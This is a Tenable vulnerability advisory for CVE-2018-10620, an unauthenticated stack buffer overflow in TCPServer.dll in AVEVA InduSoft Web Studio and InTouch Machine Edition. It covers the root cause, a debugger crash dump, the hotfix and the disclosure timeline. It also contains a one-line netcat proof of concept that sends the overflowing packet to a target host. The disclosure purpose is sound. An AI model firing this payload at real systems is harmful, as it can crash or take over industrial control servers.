Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] AVEVA InduSoft Web Studio and InTouch Machine Edition Remote Code Execution

Critical

Synopsis

Tenable found a stack buffer overflow vulnerability in TCPServer.dll while developing a Nessus plugin for CVE-2018-8840. To understand the vulnerability a description of the WSTR structure in TCPServer.dll is useful. The WSTR class is used to store wide-character strings:

 Class WSTR
 {
 vftable;
 unsigned short lbuf[0x40]; // local storage for the string data
 void *pData; // ptr to string data; can point to @lbuf
 int32 DataLen; // length allocated for @pData
 ...
 };

Strings shorter than 0x40 bytes are stored in the lbuff array. Otherwise, heap memory is allocated and pData and DataLen are updated accordingly.

When processing command 81, TCPServer.dll tries to read a string into a WSTR object. To determine if the string should be stored in lbuf or in a heap allocated buffer, TCPServer.dll will first read in the string length. The user provided length is incremented by one to account for a null terminator and compared against 0x40. If the length + 1 is less than 0x40 then the string will be stored in lbuf. A remote unauthenticated attacker can abuse this by providing a length of 0xffffffff. When one is added the length rolls over to zero which causes TCPServer.dll to try to store the string in lbuf. The server will then attempt to copy 0xfffffff bytes into lbuf resulting in the following stack buffer overflow:

STATUS_STACK_BUFFER_OVERRUN encountered
(9e8.b28): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
kernel32!UnhandledExceptionFilter+0x5f:
766ce331 cc              int     3
0:020> kb
 # ChildEBP RetAddr  Args to Child              
00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL - 
01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
WARNING: Stack unwind information not available. Following frames may be wrong.
02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041
[...]

The following commands will recreate the issue:

cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234

Solution

AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability.

Disclosure Timeline

04-23-2018: Vulnerability discovered.
04-24-2018: Having issues with the Schneider vulnerability reporting web form, Tenable asks a previous contact who the appropriate email contact should be for vuln disclosure.
04-24-2018: Schneider provides the appropriate contact.
04-24-2018: Tenable discloses via encrypted email. Informs Schneider of disclosure deadline of July 24, 2018.
04-24-2018: Schneider acknowledges vulnerability. Assigns LFSec00000128.
06-04-2018: Schneider provides a test build for Tenable to look at.
06-05-2018: Tenable acknowledges the new build.
06-05-2018: Tenable confirms the fix in the test build.
06-25-2018: Schneider says Aveva advisory likely going out on the 29th. Asks Tenable about plans to disclose.
06-25-2018: Tenable explains policy. Asks for notification when the Aveva advisory is published.
06-26-2018 - Schneider acknowledges Tenable's request.
06-29-2018 - Tenable asks if the advisory is coming out today.
06-29-2018 - Schneider responds that the advisory will be delayed at least another week.
07-03-2018 - Schneider finds additional issues. Delaying release further. Asks about extending 90 days.
07-03-2018 - Tenable acknowledges and informs Schneider that extending the 90 days is not possible under our disclosure policy.
07-12-2018 - Schneider indicates advisory release tomorrow (July 13)
07-13-2018 - Schneider sends Aveva branded advisory to Tenable
07-13-2018 - Tenable asks if the advisory will be published today

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2018-10620
Tenable Advisory ID: TRA-2018-19
CVSSv2 Base / Temporal Score:
10.0 / 7.8
CVSSv2 Vector:
AV:N/AC:L/Au:N/C:C/I:C/A:C
Nessus Plugin ID: 111466
Affected Products:
InduSoft Web Studio v8.1 and below
InTouch Machine Edition 2017 v8.1 and below
Risk Factor:
Critical
Additional Keywords:
LFSec00000128
ICSA-18-200-01

Advisory Timeline

07-18-2018 - [R1] Initial Release
07-25-2018 - [R2] Added ICS-CERT advisory